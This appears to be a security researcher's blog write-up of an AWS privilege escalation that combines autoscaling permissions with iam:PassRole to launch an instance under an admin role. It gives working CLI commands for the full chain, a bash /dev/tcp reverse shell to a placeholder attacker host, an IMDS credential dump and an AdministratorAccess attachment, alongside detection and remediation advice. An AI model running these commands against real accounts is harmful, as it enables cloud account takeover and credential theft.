This article is about a privilege escalation abusing AWS managed policies and default configurations.
IAM permission misconfigurations and privilege escalations on AWS have been thoroughly discussed in the past, especially by Rhino Security Labs and Bishop Fox, so I created an AWS laboratory account to test old and new attacks on the AWS infrastructure, especially the IAM service.
While searching for unusual permissions granted by Amazon managed policies and their combinations, I found that the AmazonElasticMapReduceFullAccess policy (v7) allows the classic privilege escalation permissions iam:PassRole and ec2:RunInstances (and many others!).
This is nothing new: with these two permissions it is possible to create a new EC2 instance, pass it a role with higher permissions than the current user, log into the instance, and use the assumed role from the EC2 service.
The iam:PassRole permission allows a service to assume a role and perform actions on its behalf.
Any AWS professional will (and should) avoid using this policy, or at least create a deny policy restricting iam:PassRole to specific roles or services.
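For context, the classic escalation with these two permissions can be sketched as follows (the AMI ID, key name, and instance profile name here are hypothetical placeholders):

```shell
# Hypothetical classic iam:PassRole + ec2:RunInstances escalation:
# launch an instance and pass it a more privileged instance profile
aws ec2 run-instances \
  --image-id ami-0123456789abcdef0 \
  --instance-type t2.micro \
  --key-name attacker-key \
  --iam-instance-profile Name=privileged-profile
# then log into the instance and act as the passed role, e.g.:
#   aws sts get-caller-identity
```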
The Amazon Elastic MapReduce (EMR) service is a big data platform for running large-scale distributed data processing jobs, SQL queries, and machine learning (ML) applications, so I searched for other policies likely to be attached to a data scientist user.
The DataScientist policy, obviously, caught my attention because of the following permissions:
This policy is a time bomb: if the attacker user/role gains the iam:PassRole permission, it can perform many privilege escalation paths by abusing a CloudFormation stack, a custom Lambda function, EC2 instances, etc.
Amazon is aware of this problem and decided to deprecate this policy (see the documentation). In fact, the new policy has restricted permissions on iam:PassRole.
To increase the difficulty, a policy called DemoDenyPrivEscs is then created. This policy explicitly denies the following actions:
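As a hedged sketch, such a deny policy could be created like this; the denied actions below are my assumption based on the classic paths mentioned in this article, and the actual demo policy may differ:

```shell
# Hypothetical recreation of a DemoDenyPrivEscs-style policy;
# the exact list of denied actions is an assumption
aws iam create-policy \
  --policy-name DemoDenyPrivEscs \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Deny",
      "Action": [
        "ec2:RunInstances",
        "lambda:CreateFunction",
        "cloudformation:CreateStack"
      ],
      "Resource": "*"
    }]
  }'
```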
Another action in the DataScientist policy caught my attention: autoscaling:*.
Now that the classic privilege escalation paths are denied by the above policy, the interesting approach is to use the EC2 Auto Scaling service to perform the privilege escalation.
The scenario is simple:
N.B.: denying iam:PassRole globally would obviously prevent basically all the major privilege escalations; but here we are experimenting.
If the Auto Scaling service has never been used, the service-linked role AWSServiceRoleForAutoScaling does not exist yet and cannot be used to start the service.
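In that case the service-linked role can typically be created explicitly, assuming iam:CreateServiceLinkedRole is allowed for the caller:

```shell
# Create the Auto Scaling service-linked role if it does not exist yet
aws iam create-service-linked-role \
  --aws-service-name autoscaling.amazonaws.com
```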
The Amazon EC2 Auto Scaling service helps organizations scale EC2 instances to maintain application availability and allows them to automatically start or terminate instances according to defined workload rules.
The service requires a launch configuration and an autoscaling group:
demo-DataScientist can then create an EC2 launch configuration and an autoscaling group with an AMI that the attacker has access to.
A launch configuration is a template that an EC2 Auto Scaling group uses to launch EC2 instances. When a launch configuration is created, information for the instances is specified, such as the ID of the Amazon Machine Image (AMI), the instance type, a key pair, one or more security groups, and a block device mapping.
The attacker then creates a launch configuration that:
The attacker now finds the latest Amazon AMI (which has the AWS CLI installed by default and supports user-data scripts):
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' | jq -r '.Images | sort_by(.CreationDate) | last(.).ImageId'
The AMI image used by the attacker must be accessible to the attacker, and there are several options:
In this phase the goal is to have access to the instance.
Using the above output it’s possible to create a launch configuration:
aws autoscaling create-launch-configuration --launch-configuration-name demo-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
The reverse-shell.sh file contains the script executed on the EC2 at boot:
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
The script simply executes a reverse shell using Bash, allowing the attacker to access the EC2 instance once it starts, without needing access to the AWS VPC or EC2 SSH keys.
Generally, any kind of reverse shell can be used since the attacker forges the startup script; a more complex one can involve obfuscation, more stable connections, downloading of complex beacons, persistence, and malware.
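On the attacker side, a minimal listener for the connect-back above could be the following (netcat flag support varies by distribution):

```shell
# Listen on port 443 for the instance's connect-back shell
# -l listen, -v verbose, -n skip DNS, -p local port
nc -lvnp 443
```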
Now that the launch configuration is created, the service also needs an autoscaling group to start/stop the instances.
The attacker then creates the autoscaling group using the demo-LC launch configuration created above to actually start EC2 instances:
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo-ASG --launch-configuration-name demo-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
The selected VPC subnets should at least allow egress traffic from the EC2 instance to the attacker's IP and port; egress security groups are normally quite permissive, so the attacker is spoilt for choice.
Using the ec2:DescribeSubnets permission defined in AmazonElasticMapReduceFullAccess the attacker can select the appropriate subnet IDs.
Once the auto scaling group is created, AWS checks whether the number of EC2 instances is within the limits defined by the autoscaling policy. Since no EC2 instance is yet available in that scaling group, a new one is created and started.
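The scale-out can be verified from the attacker's side, for example with a query like this (a sketch using the group name from the commands above):

```shell
# Check that the new instance is being launched by the group
aws autoscaling describe-auto-scaling-groups \
  --auto-scaling-group-names demo-ASG \
  --query 'AutoScalingGroups[0].Instances[].LifecycleState'
```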
The attacker's server receives a reverse shell when the instance boots:
With this shell it is now possible to use the demo-EC2Admin role from within the EC2 instance, or to dump the session tokens using a simple HTTP GET request to the IMDS.
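A minimal sketch of that IMDS request, possible over IMDSv1 because the launch configuration set HttpTokens=optional; the role name assumed here matches the demo-EC2Admin instance profile used above:

```shell
# From inside the instance: list the attached role, then fetch its
# temporary credentials (AccessKeyId, SecretAccessKey, Token)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/demo-EC2Admin
```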
Since AWS is aware that an EC2 role shouldn't be used outside AWS, any use of the session token from outside AWS triggers an alert with the signature UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS.
From the reverse shell the attacker can now gain Administrative privileges:
aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name demo-DataScientist
The minimum required privileges for this privilege escalation are:
This privilege escalation is quite easy to spot on your AWS account, especially if you are using IaC to deploy and manage AWS resources: just search for any usage of the autoscaling:* action or DataScientist policy combined with iam:PassRole.
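A quick (hypothetical) search over an IaC repository could look like this, assuming the Terraform code lives under a terraform/ directory:

```shell
# Flag any use of autoscaling:*, iam:PassRole, or the DataScientist policy
grep -RnE 'autoscaling:\*|iam:PassRole|DataScientist' terraform/
```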
In this gist you can find the Terraform code to deploy a minimum viable scenario to exploit this privilege escalation.
The problem here is not specifically the usage of an AWS managed policy but the combination of autoscaling and iam:PassRole permissions.
To actually perform the attack the attacker must know the role name to attach to the EC2 instance and the security group that allows egress traffic.
The DataScientist policy allows iam:ListRoles, so even if the attacker does not know the correct role, they can guess it from the list or via trial-and-error; the same approach can be used to list security groups, VPCs, and subnets.
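The enumeration described above can be sketched with a few read-only calls (the --query filters are illustrative):

```shell
# Enumerate candidate roles, security groups, and subnets
aws iam list-roles --query 'Roles[].RoleName'
aws ec2 describe-security-groups \
  --query 'SecurityGroups[].{Id:GroupId,Egress:IpPermissionsEgress}'
aws ec2 describe-subnets --query 'Subnets[].SubnetId'
```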
PMapper, from NCC Group, is able to display this privesc but does not explain how to actually exploit it:
In AWS, IAM Principals such as IAM Users or IAM Roles have their permissions defined using IAM Policies. These policies describe different actions, resources, and conditions where the principal can make a given API call to a service.
Administrative principals can call any action with any resource, as in the AdministratorAccess AWS-managed policy. However, some permissions may allow another non-administrative principal to gain access to an administrative principal. This represents a privilege escalation risk.
role/demo-DataScientist can escalate privileges by accessing the administrative principal role/demo-EC2Admin:
* role/demo-DataScientist can use the EC2 Auto Scaling service role and create a launch configuration to access role/demo-EC2Admin
A quick fix is to create a policy denying the auto scaling privileges to roles or users, but this should be considered just a patch pending a more precise remediation and tuning of the iam:PassRole permission.
The remediation is to follow the AWS security best practices for Identity and Access Management:
As a rule of thumb, it is best to avoid AWS managed policies: they are created just to make things work without trouble and tend to be overly permissive.